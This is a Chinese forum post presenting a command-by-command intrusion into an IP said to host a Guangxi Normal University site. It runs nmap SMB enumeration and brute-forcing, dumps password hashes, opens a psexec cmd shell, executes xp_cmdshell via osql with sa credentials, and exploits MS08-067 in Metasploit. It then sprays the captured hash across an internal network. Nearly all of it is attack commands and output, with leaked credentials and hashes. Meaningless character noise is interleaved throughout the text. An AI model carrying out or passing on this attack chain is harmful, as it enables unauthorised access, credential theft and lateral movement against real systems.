广西师范网站http://202.103.242.241/3 F. @2 T. f2 @$ B& P2 g
; s7 C! n( L$ T, A. E; U) K
root@bt:~# nmap -sS -sV 202.103.242.241
2 {& K7 k; R9 g8 b5 h2 N* D+ s0 u+ N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
/ s u1 b6 ^. K9 L
% P- K5 A3 [9 q' |) TNmap scan report for bogon (202.103.242.241)1 h% j9 I4 U' W' x$ ^4 N
% y3 g9 T6 D- b9 V( ^/ k( p( }
Host is up (0.00048s latency).
0 P5 }% E5 T' G6 e& D+ ^; V& P; ?7 X/ h7 q7 L! p
Not shown: 993 closed ports0 o$ N' K& @+ p8 g# R
4 C5 x& ?' d: N" s
PORT STATE SERVICE VERSION
: y0 I6 S" `- ~. S' X4 C8 t7 g
- j2 C. z4 u# T9 F* g: Q135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)2 v5 q( [3 G' ^' w/ e, c
9 @# b2 e. f, B% K" y
139/tcp open netbios-ssn
$ ^7 \4 B4 @8 Y' H1 Y8 a) D! }; v5 b& W0 `" ?% a) N& ~' v0 Y
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
t O$ I, _5 K, Q* f& b0 W9 t/ ^1 @
j& V. G ?9 t5 r$ o/ O; Q s8 Q1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
2 l6 e) q' _* E! u0 m# b; Q
5 Z5 G4 [. j; j# \/ J9 x1026/tcp open msrpc Microsoft Windows RPC
9 w( }) _4 y" c- R5 Z! u) N" i, A+ c3 ^+ z. A, f2 ~
3372/tcp open msdtc?, `# d! N2 j' w
* e& I# {& P! ~0 R- y$ ?2 c3389/tcp open ms-term-serv?4 _: n9 Y$ g# X; }
; l+ O, O& g3 m
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
3 L5 Q% D4 G9 ASF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r! E. {3 V2 I: r! d
% W9 `1 H) o6 \7 NSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
$ y' E) V0 _$ U: j% W& F7 D* S9 U( B( J) K
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 Q. o% m# d+ j8 P
" ?5 h* E4 x4 W! c# ?7 SSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
9 X9 {& ^) P+ c2 q
8 f7 H: ]( n7 x3 h, JSF:ptions,6,”hO\n\x000Z”);
' r+ V3 P3 l' }1 R1 w0 w: H
, y9 E* Y* Y) K; C. CMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)) u( Y2 z) J8 b# a5 c: e: z" v
- ]+ N/ i5 g: w* r1 \. cService Info: OS: Windows1 W8 R2 e7 U1 |9 K- M
! Z1 Z6 [- Q# ?" W4 e; D3 o
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .. d/ y6 M# B" y) M* Y3 X5 {7 I1 v! j/ g
4 q4 v5 `9 T" X3 j) }0 f7 MNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
9 [' C: @0 ?1 ]6 ?: E, Y* T4 n9 X/ T: z; D9 ]
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本- _" H9 Z: }7 U/ u9 `5 S
9 c& f* k W0 K7 L3 N-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
1 M+ c( r3 {% _, }8 t6 n, s) O! s) ^" _, e# f5 A
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse5 V- U+ S: S; |
6 c4 V) a! O2 r) x-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
, C0 g9 x& M+ |: P( s, y% M0 Z$ _; T8 O
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
- _' M# T$ c4 P8 ?0 P8 `. u5 k0 P& E4 i" h" Z& G7 }
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
K f! t( y; P- V9 `
+ Y B) P. L+ _& s% r: E* h-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse" C7 M5 G8 w( w. J* N5 j7 A k( {
- D' F7 Y j& H. Y# H: R
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse2 _+ J: H4 h8 K& ?4 Y( y9 J' j3 g( ]
, F% r3 w5 \/ I6 F2 d-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse2 |% E; k$ w: s2 ~* A7 K7 o
) @3 u+ [: S7 P$ _! O-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse! v9 ^) W; k6 s9 n
/ J0 b9 T5 W1 Q% L2 F2 H6 V, u! e6 |) t0 A-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse# e5 h( @6 @; e7 q' t% u" ~0 O
5 ^- @0 r" c1 c F+ B& }
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse" a- ? k4 Y& v% S3 [3 P+ ~
2 b/ W6 e1 s- r9 d. [3 g* l
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse7 o( c) Q) ^. y' F
2 P5 R6 \- T+ O7 k. x-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
0 w' w9 S7 l& p' Y% `$ \
- l% X1 F7 _! W-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
9 k' A$ F1 R6 v) x0 g$ I+ M/ h6 B1 r h3 N7 x9 K' q7 T/ _$ |
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse& D) S+ z" g3 q5 w
/ x% y! s8 G' t p/ } R! L e" A
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
1 [! D7 W; Y7 T- d5 |. p5 {1 r: ]# d: P- S3 ^4 [& t
//此乃使用脚本扫描远程机器所存在的账户名
3 v( i- }( D5 ^. R# D- I; C
2 |* `+ k/ D/ A8 b8 o) T$ _2 g1 tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
0 b. Q4 b* Z* c. v6 m
: B6 o8 |, ?) K0 |7 e4 hNmap scan report for bogon (202.103.242.241)
. l, K9 E: l# X L- J! M j3 i4 u1 F0 U7 @
Host is up (0.00038s latency).' b, b s S) _; |
0 u/ B! Y5 E* F1 |4 z8 yNot shown: 993 closed ports6 d. V F O7 R6 z
! f5 t1 b9 [- F! fPORT STATE SERVICE( V$ z; t* _; W9 H; ^
! e0 e# z1 D0 O0 D8 {! [3 @
135/tcp open msrpc
% b7 ^( {% g6 J9 C, U/ S/ O% R/ F$ y
139/tcp open netbios-ssn
M$ M! s0 ^& Z5 r& U, D! G) I& ?4 l+ x) N( j* r
445/tcp open microsoft-ds
+ P4 h$ A$ z! b/ p2 j& s5 ~4 b
6 t3 R5 c1 j, H1 F1025/tcp open NFS-or-IIS+ v+ ^$ n- ]9 N- S$ j
3 `& u; `4 Y" C, d/ i: s1026/tcp open LSA-or-nterm
' z- \) [5 e0 z
& \ h$ ~5 \0 E! S& X$ V; w6 k3 J' H3372/tcp open msdtc; _& ~, _8 z' D0 ?8 V
G L/ S% L0 g& Y
3389/tcp open ms-term-serv3 p0 ^ _3 \+ l* w
k1 ?; F6 d6 D. m4 E# X/ v7 \MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
g5 n4 R3 ~1 r# ?- e, H0 m
) D4 l/ V# @) w) D4 aHost script results:
: X+ D1 l' L0 s3 U" \# a1 H6 c+ P4 F: l b( n
| smb-enum-users:7 E% b1 P' Q6 {: A; t
3 \' D9 x( j. ^( x6 Y' A. Z
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果' F2 f/ y8 j. d. k; J
9 a7 }* t7 Q1 z; o
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
% I2 K: V E' J" n7 R- {8 g* Y' B9 ]( B. ?: f" f# J
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 % i& Z. M2 Z1 J2 z8 n) F! P4 N7 s
@. ?/ W. W4 K4 e6 l
//查看共享, q5 G' G. d/ B2 r2 _ L
- J& i3 W* m$ p5 {- P5 s- q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
* V5 p) L: O% |- e% b3 ]3 X
8 i L8 @. N$ y* vNmap scan report for bogon (202.103.242.241)% H" L% F* j7 Q! h" Y
& |5 R$ t9 V4 D# e) o
Host is up (0.00035s latency).
/ f2 s, U% k' N: f7 ?' }" u% L7 [0 r' ]2 A2 J& A% c" S9 u
Not shown: 993 closed ports
% T8 S$ G9 j; x$ Y" J3 ^
" E0 H$ ~$ _7 c) A, w! b$ BPORT STATE SERVICE
( X& F. j& P% B; Y3 r
9 c! W2 U8 R$ C& \( O+ w135/tcp open msrpc& ]' j9 U# W7 J# a3 N
+ ]; k. _: ~$ Q4 |/ J! @& \139/tcp open netbios-ssn5 V/ p: \* h8 {
8 O5 Z) C% a' R
445/tcp open microsoft-ds
) u+ K9 A& m: v% O4 K |( T$ B- i+ }
1025/tcp open NFS-or-IIS
% D( o$ u8 `- k9 p% v1 I6 E% i, N4 ~. H7 S- I; `
1026/tcp open LSA-or-nterm4 y. c8 e# l" @
( ~: c5 K9 A2 l, n+ ?+ J' e
3372/tcp open msdtc3 p, I3 P; ?* D
( i0 A+ ` A; I0 e- Y3389/tcp open ms-term-serv& a Y& _) V7 _" o9 I
4 X$ T+ z# }, M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): o: d9 B# ~( k9 U+ w. [( Y# n, x! @
# w. W- D& R5 s+ U% g. M
Host script results:
1 G- U, Z" R: _5 J9 b3 f p% z+ \; _4 Y! X. H& k
| smb-enum-shares:, \+ V& i; ]5 x
, }2 M) }! c" V& _% y
| ADMIN$
3 C% P, ~) j4 O1 [% ^' Q" _7 q
8 @) i, y; F, n. B| Anonymous access: <none>
3 j& x, [6 S2 G, ?
7 i8 c) B3 d- p5 z| C$
/ y! P! P6 Z4 T1 X: H! k# D2 w* d" }; ?
| Anonymous access: <none>
; f' t* X& N$ r0 G' ~4 m: X. n7 g- r; }
| IPC$
; E3 `$ r% I4 _4 p
/ M p5 v+ L2 o. Y2 n# C|_ Anonymous access: READ
) w1 @; r: d$ {
/ I2 {) b s# {, o6 ?Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds& `; d3 A1 `4 Z) {! O- o
' D- U& e# k3 y0 Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 * o$ l- h, L9 f# j; t$ @8 k: x
7 \! Q' a" x( Z9 ?: s$ n: W% P5 U//获取用户密码1 b b3 k/ b$ }; B* @7 ]
4 R3 Q ~4 s2 V# v) j3 C, C
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) Q" m( ^% s0 t2 R' n
# R5 C9 S% I9 M- P6 u9 ]% c- w0 LNmap scan report for bogon (202.103.242.2418)& B5 L+ D$ {5 f2 \
1 [6 u! K+ O! R3 ^; X1 a3 x+ t
Host is up (0.00041s latency).
9 j' W7 h$ A6 R0 s0 C& c. T4 [* g, i
Not shown: 993 closed ports
! q% R: k! q, J
# @0 J7 r/ b! |( B3 WPORT STATE SERVICE
, k: [, Z; g( c: A' P' |7 g* f Y9 U$ [) d% J& K
135/tcp open msrpc& v9 T9 L9 C- f) q: B0 K! c
# i J, R V0 v; q
139/tcp open netbios-ssn' p; r, ^7 o' A. l3 |( t! ?
* _# H2 s, c. X4 @% O& y445/tcp open microsoft-ds
! P0 U- g, o2 x8 ~
0 H1 R; s5 X; }4 q5 L' f1025/tcp open NFS-or-IIS, ` C: U( s" w" e& d: v6 |; d r
3 L6 E4 ]6 X. y5 v" G- u
1026/tcp open LSA-or-nterm3 C U2 T' c1 X W, h2 Y7 @! ?3 G! d3 ?
* B$ U7 J1 l' l. |5 N: v
3372/tcp open msdtc
3 f6 z' [9 `/ {, j3 S% S3 g7 o3 U, h( D# T
3389/tcp open ms-term-serv, D1 o+ B8 j/ ^. e/ C4 l- O1 T
; w! C5 }/ v+ a: ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: i2 }, \' H7 l( ] y1 m$ w `' W; B4 Z' D6 p% R
Host script results:
) w3 F" C# B' \ z0 C
1 a6 \/ h4 l4 ]. ? u$ k| smb-brute:# h* G& w2 G4 s6 ]/ d/ a
9 L. ^ }2 U- k( h. R8 X( z* d+ a
administrator:<blank> => Login was successful
& s/ v% K) t) t9 f" z9 R1 t( U: [5 C2 ~ P4 H h
|_ test:123456 => Login was successful
' g+ h+ k) ~; q" A2 i6 V; Z) O) N& ~
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds# a1 `7 a+ h2 c7 X) D* S
+ G0 u7 D. g8 I' Yroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 ^9 q, a e8 ~
* F6 W$ ]* k/ y8 }2 n. _; |" c
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data$ L9 V2 P) G2 T
( M" O% _- f: B4 U' m proot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse# s. \! t0 K2 N! c: V' S/ L
6 Y7 d4 @* J' _& j( ]3 ^root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1396 ^6 t& p& f" D1 c+ v
1 v4 C6 r C. a b; {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; {9 V+ ~/ J# W7 v& b" O) G) k
p7 ^! Z/ I5 W2 F- X+ W! Q3 ZNmap scan report for bogon (202.103.242.241)) J" g: r3 R/ s2 W ?
) r& P5 l1 ?5 i0 a& E' r9 F. q4 ^, YHost is up (0.0012s latency).3 l. T) }! b5 X& c2 A8 A& l
5 x i% e/ l' K4 ?PORT STATE SERVICE5 j! o5 U' |8 s+ f+ _! ~
/ }: ]6 d H% e/ r" l
135/tcp open msrpc, j9 Z3 y7 F' }1 x
' |% Q$ \- G$ m4 p
139/tcp open netbios-ssn; M4 r6 {* ? \6 T7 z# L2 j
! z( d4 Z9 o D2 H5 y+ c! {( u
445/tcp open microsoft-ds8 ~ ]( g3 } X H1 ]: z
o$ I6 p0 S6 W3 I; R3 u. g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& V0 ?/ T: t9 N M! T: @# L4 J2 V% E
# h; S, T/ J. `( WHost script results:
5 R1 c% Y3 K6 c; ]$ n+ Y: t
9 G7 c5 {) F8 Q( s| smb-pwdump:5 _" x$ k- M& J% u9 `
, x4 A; v1 Z" _$ D3 k5 D% X( A9 N
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
/ j6 M1 }9 I( w& h2 M+ F7 X
+ O3 S: W0 B2 N" P5 \% Z) G" d| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
* k7 P& ^2 b# O t% D5 X! A" n% ?/ U( g5 i# e0 g! W$ J1 k9 z% v5 y! K% u' c
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4" J: f' R! n! C% W& q. ]: I4 A
: } i% |/ p! J$ @1 y* S: O|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2" i& O. H" |/ N, r7 m
! M$ w6 N$ m! m( T& K) Q L" eNmap done: 1 IP address (1 host up) scanned in 1.85 seconds/ @) B% X) z D3 X
, u1 x, F) }% J* y4 B8 \! ^
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
/ w: Y9 p5 i5 J5 i9 {% K/ g/ U
5 x' A: r- S4 y-p 123456 -e cmd.exe6 {' V* o- s7 Q, K% `9 g2 w
0 N4 C" v! ?( q- uPsExec v1.55 – Execute processes remotely
& Q6 d7 _: I* ?0 L% r8 m
9 u. k$ W: W0 B! ^: Y1 e/ QCopyright (C) 2001-2004 Mark Russinovich' v% Q$ m8 x7 P
1 Z% ? j% l. w2 t0 l3 a/ g
Sysinternals – www.sysinternals.com% K p! S2 i# h" P0 Q C9 B. R% D
6 Y8 a7 }5 m' v7 R4 V& v
Microsoft Windows 2000 [Version 5.00.2195]
. [5 H, H& I. n' ^: X% Q: f4 s2 h* P
(C) 版权所有 1985-2000 Microsoft Corp.
4 F' Z/ V. M p! q1 `0 J
' z$ d; ?8 @3 _& XC:\WINNT\system32>ipconfig
" n1 e+ g1 r; l N: I% \# L7 Z0 C( Z4 ~8 P b$ b6 c# k$ F: y8 W* |
Windows 2000 IP Configuration; ]" C0 M- w. |1 C4 x
; l# b/ x6 ?# t- W% c% OEthernet adapter 本地连接:2 K" f8 X- _7 W5 D0 k
8 m1 l; o% P3 j% wConnection-specific DNS Suffix . :
2 H9 H/ s. k |$ \# b* q3 {$ i# `
6 I6 s, I, c6 I C5 T7 `IP Address. . . . . . . . . . . . : 202.103.242.241; q1 V! U2 M2 B7 B# ? H
, @) `7 u# L# M. ~: U* E
Subnet Mask . . . . . . . . . . . : 255.255.255.00 }: n0 e2 _$ l) b" m
/ O# M/ ?. n+ \4 R1 N2 yDefault Gateway . . . . . . . . . : 202.103.1.1
6 L" f- X+ B$ l
% B" l: ^ d9 U) Q J0 `C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令) e7 b( Z* M3 G* K6 |% B s
# F* n! z4 y) C1 D! O1 n: \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞0 C7 I8 {+ n+ M4 u, g
6 ^% f; n" m# R: ^ HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
: x* W* k8 M+ u9 z! I
# S( r8 X+ {/ R) tNmap scan report for bogon (202.103.242.241)
, x" z* H, S- @. k& {; l4 v6 W
4 g% c9 A% h9 p5 H2 _8 YHost is up (0.00046s latency).3 U: j- r1 Q- O) Y
$ h2 P" J6 e. d
Not shown: 993 closed ports
7 `+ J* t! ]; Y- |2 b& C" \; J2 c3 H# p) q
PORT STATE SERVICE
5 V: L( C0 t4 j1 B( ?6 q5 V
[6 X. L& x M3 q; k7 g135/tcp open msrpc' m5 w3 x5 G) i7 @4 S( ? {
0 J; {3 ~' t! R# @8 `
139/tcp open netbios-ssn
9 R& P+ q, U% O/ Z G, E' \* e
6 v$ N) X1 Q) I% c445/tcp open microsoft-ds. e4 g. f) @# |+ \6 D6 M" c
, u% u! {% {# R/ k, D
1025/tcp open NFS-or-IIS1 z& i, k0 ~! b" D7 }* C
A; N1 g# i. ^9 [& @1026/tcp open LSA-or-nterm
5 Z+ @, i: V$ j- P7 q: j
0 @0 r9 L! h, g3372/tcp open msdtc
% G0 _. W4 q$ Y. s0 |. R3 y. B: ^3 ~' a- D& F2 Z
3389/tcp open ms-term-serv
( @$ i$ ~- }- z, |+ z6 P5 c4 z+ X/ E9 j1 N6 ^0 o- t
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, p9 a/ t( t2 i$ Y& l% U, J2 n
' n4 r1 |1 { S. S. F: G# BHost script results:
0 n( G/ m. t+ y' @: h* _9 ]5 B6 U5 A
9 M/ V& v$ Z% X0 z. }5 |6 K0 D| smb-check-vulns:; ~7 `2 I5 N) Q u- W
" b2 g8 z5 j- Z. L8 P+ E$ \
|_ MS08-067: VULNERABLE1 {4 I7 j' r* g) G3 {
* I/ t( W/ r1 @9 TNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
4 r. o# {; F) ?( K* z% S/ q3 c0 v: R# |7 C8 F
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
! A! m3 b. B( A" N5 i j3 L- B
% C8 a* y7 K; B1 Q! }msf > search ms08' T; H" D/ x" N/ E* ~9 n- Y
( X3 a8 j+ O/ | ^, r. g8 O
msf > use exploit/windows/smb/ms08_067_netapi
9 K0 m, o" P+ }5 T" K. c
3 m6 W- W; s5 \msf exploit(ms08_067_netapi) > show options) q. M% y6 {7 b6 f
& Y$ W: h" G7 i1 H) Q. `& Vmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2415 _6 P9 y7 [+ R) E1 a: P
2 F a9 H4 V* B3 }
msf exploit(ms08_067_netapi) > show payloads
" r* a2 t* v* i. T
* \7 ^7 d0 M) x3 a" u$ dmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
. e2 b' T7 S; y- ~! e1 w
7 e( ]$ X$ M! e; C0 b0 n& O2 Fmsf exploit(ms08_067_netapi) > exploit1 z* b# v* e7 ~& b
8 E, ?0 X: K. nmeterpreter >- m$ X1 U( J9 O- ]
6 x* s2 P3 j3 M$ l5 x- ^$ z6 yBackground session 2? [y/N] (ctrl+z)2 @0 a1 w& n7 \3 a$ [
" S' c m3 q+ |3 Vmsf exploit(ms08_067_netapi) > sessions -l2 Z/ s2 K& i0 F0 [; F) C
- K4 e( |$ V; r6 O9 |/ \root@bt:/usr/local/share/nmap/scripts# vim usernames.txt1 m, h; o, @7 L6 C( M8 v
- [( h$ d/ ~( s4 `+ vtest( n7 m+ F) B0 g4 {; l
2 h& ?/ ]6 Q- n/ |+ u
administrator5 F* f( }/ D1 a7 f; p
, P2 e: C5 T! J5 W, ?0 y- S1 h& b
root@bt:/usr/local/share/nmap/scripts# vim password.txt4 v1 G$ Y0 B4 a: u$ b
2 e& G9 s, _7 @9 y- h% i. p
44EFCE164AB921CAAAD3B435B51404EE
0 L( O8 ~0 q- A/ y* W' i! A
4 M+ r* v5 l7 Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
1 l( {* r* V2 u& S- {' ]" a4 F
& n/ z- a# Q6 b5 R //利用用户名跟获取的hash尝试对整段内网进行登录3 q1 Q( k4 x P
/ w/ d, j9 g( F2 W+ A; {/ n& [# n
Nmap scan report for 192.168.1.105
9 ~: E' B/ I1 m" { p8 P. ` y
Host is up (0.00088s latency).
1 b, |" ^' {7 r4 z5 N( g5 g8 g, K' O1 C) H5 B
Not shown: 993 closed ports5 J5 X* i9 x4 w# R
4 {) Z! D1 l, ?7 n' v u
PORT STATE SERVICE
( @5 K" o" R. ]6 l% g* H' D9 h+ P
) a8 |3 b& _7 E; [6 E" b R135/tcp open msrpc/ @: E0 w2 @8 `7 M% N" d) E- e! ~" s
% \1 R- @! f- p' Q
139/tcp open netbios-ssn$ o( ?6 t6 N+ E( W
$ M3 r" J! M2 A `# j- W4 O
445/tcp open microsoft-ds" i4 K, d& r1 V% L2 L1 ]- i. d
# H {5 A. V7 R1025/tcp open NFS-or-IIS/ W0 C( e$ }" m) D6 G9 Q0 M
6 _& P+ y! e1 h2 \+ ~. p1026/tcp open LSA-or-nterm
: O8 F) G4 v* _# N/ S( W$ v8 e2 @0 R
3372/tcp open msdtc( T7 E1 U4 c: ^3 M8 T3 U. ~
4 i! ^. s. u* O; `% J; C' q& V3389/tcp open ms-term-serv
! Z, Y4 a s: i& ` k- j0 o. s3 k8 O @" w) O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 h7 Z+ j0 ^. z. [
K0 V+ |# x W! L; \, ^- nHost script results:
& s3 K# O% l" n, @- M$ H' a
" [. }3 S, t9 I% N3 C| smb-brute:
5 m, R" }" E d2 [# Z8 ^: ~* t- V- W! \- s0 g* [( \7 {
|_ administrator:<blank> => Login was successful
. N# r7 |7 E/ @7 G$ Q- N z- e" v0 W' n( S
攻击成功,一个简单的msf+nmap攻击~~·
s% W b' u4 J7 [9 z d. F1 _( f; a6 L1 u ^, J( N
|
发表于 2012-12-4 12:46:42
收藏
支持
反对